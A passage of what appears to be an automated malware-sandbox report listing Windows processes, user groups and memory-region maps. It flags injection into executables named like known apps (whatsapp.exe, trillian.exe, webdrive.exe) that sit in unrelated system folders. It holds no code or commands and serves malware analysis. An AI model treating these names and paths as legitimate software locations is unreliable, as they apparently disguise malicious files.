"Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3846 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3847 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3848 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3849 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3850 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3851 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3852 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3853 start_va = 0x140000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 3854 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3855 start_va = 0x200000 end_va = 0x2defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 3856 start_va = 0x300000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 3857 start_va = 0x370000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 3858 start_va = 0x470000 end_va = 0x5f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3859 start_va = 0x600000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3860 start_va = 0x680000 end_va = 0x800fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 3861 start_va = 0x810000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 3862 start_va = 0xa50000 end_va = 0xa66fff monitored = 0 entry_point = 0xa514a1 region_type = mapped_file name = "trillian.exe" filename = "\\Program Files\\Windows Photo Viewer\\trillian.exe" (normalized: "c:\\program files\\windows photo viewer\\trillian.exe") Region: id = 3863 start_va = 0xa70000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 3864 start_va = 0x1e70000 end_va = 0x2833fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e70000" filename = "" Region: id = 3865 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3866 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3867 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3868 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3869 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3870 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3871 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3872 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3873 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3874 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3875 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3876 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3877 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3878 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3879 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3880 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3881 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3882 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3883 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3884 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3885 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3886 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3887 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3888 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3889 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3890 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3891 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3892 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3893 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3894 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3895 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3896 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3898 start_va = 0x910000 end_va = 0x9c5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Thread: id = 188 os_tid = 0x8d8 Process: id = "35" image_name = "webdrive.exe" filename = "c:\\program files\\msbuild\\webdrive.exe" page_root = "0x4cb38000" os_pid = "0x8d4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\MSBuild\\webdrive.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3899 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3900 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3901 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3902 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3903 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3904 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3905 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3906 start_va = 0x100000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 3907 start_va = 0x180000 end_va = 0x196fff monitored = 0 entry_point = 0x1814a1 region_type = mapped_file name = "webdrive.exe" filename = "\\Program Files\\MSBuild\\webdrive.exe" (normalized: "c:\\program files\\msbuild\\webdrive.exe") Region: id = 3908 start_va = 0x210000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3909 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 3910 start_va = 0x4b0000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 3911 start_va = 0x530000 end_va = 0x6b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3912 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 3913 start_va = 0x7d0000 end_va = 0x950fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 3914 start_va = 0x960000 end_va = 0x1d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 3915 start_va = 0x1e00000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 3916 start_va = 0x1e40000 end_va = 0x1f1efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 3917 start_va = 0x1f20000 end_va = 0x28e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f20000" filename = "" Region: id = 3918 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3919 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3920 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3921 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3922 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3923 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3924 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3925 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3926 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3927 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3928 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3929 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3930 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3931 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3932 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3933 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3934 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3935 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3936 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3937 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3938 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3939 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3940 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3941 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3942 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3943 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3944 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3945 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3946 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3947 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3948 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3949 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3951 start_va = 0x28f0000 end_va = 0x2a35fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028f0000" filename = "" Thread: id = 189 os_tid = 0x8dc Process: id = "36" image_name = "whatsapp.exe" filename = "c:\\program files (x86)\\windowspowershell\\whatsapp.exe" page_root = "0x4d83e000" os_pid = "0x8cc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files (x86)\\WindowsPowerShell\\whatsapp.exe\" " cur_dir = "C:\\Program Files (x86)\\WindowsPowerShell\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3952 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3953 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3954 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3955 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3956 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3957 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3958 start_va = 0xa0000 end_va = 0x11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3959 start_va = 0x120000 end_va = 0x186fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3960 start_va = 0x200000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3961 start_va = 0x290000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 3962 start_va = 0x3c0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 3963 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3964 start_va = 0x550000 end_va = 0x6d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 3965 start_va = 0x6e0000 end_va = 0x860fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 3966 start_va = 0x870000 end_va = 0x94efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 3967 start_va = 0xa60000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 3968 start_va = 0xd00000 end_va = 0xd16fff monitored = 0 entry_point = 0xd014a1 region_type = mapped_file name = "whatsapp.exe" filename = "\\Program Files (x86)\\WindowsPowerShell\\whatsapp.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\whatsapp.exe") Region: id = 3969 start_va = 0xd20000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 3970 start_va = 0x2120000 end_va = 0x2ae3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002120000" filename = "" Region: id = 3971 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3972 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3973 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3974 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3975 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3976 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3977 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3978 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3979 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3980 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3981 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3982 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = 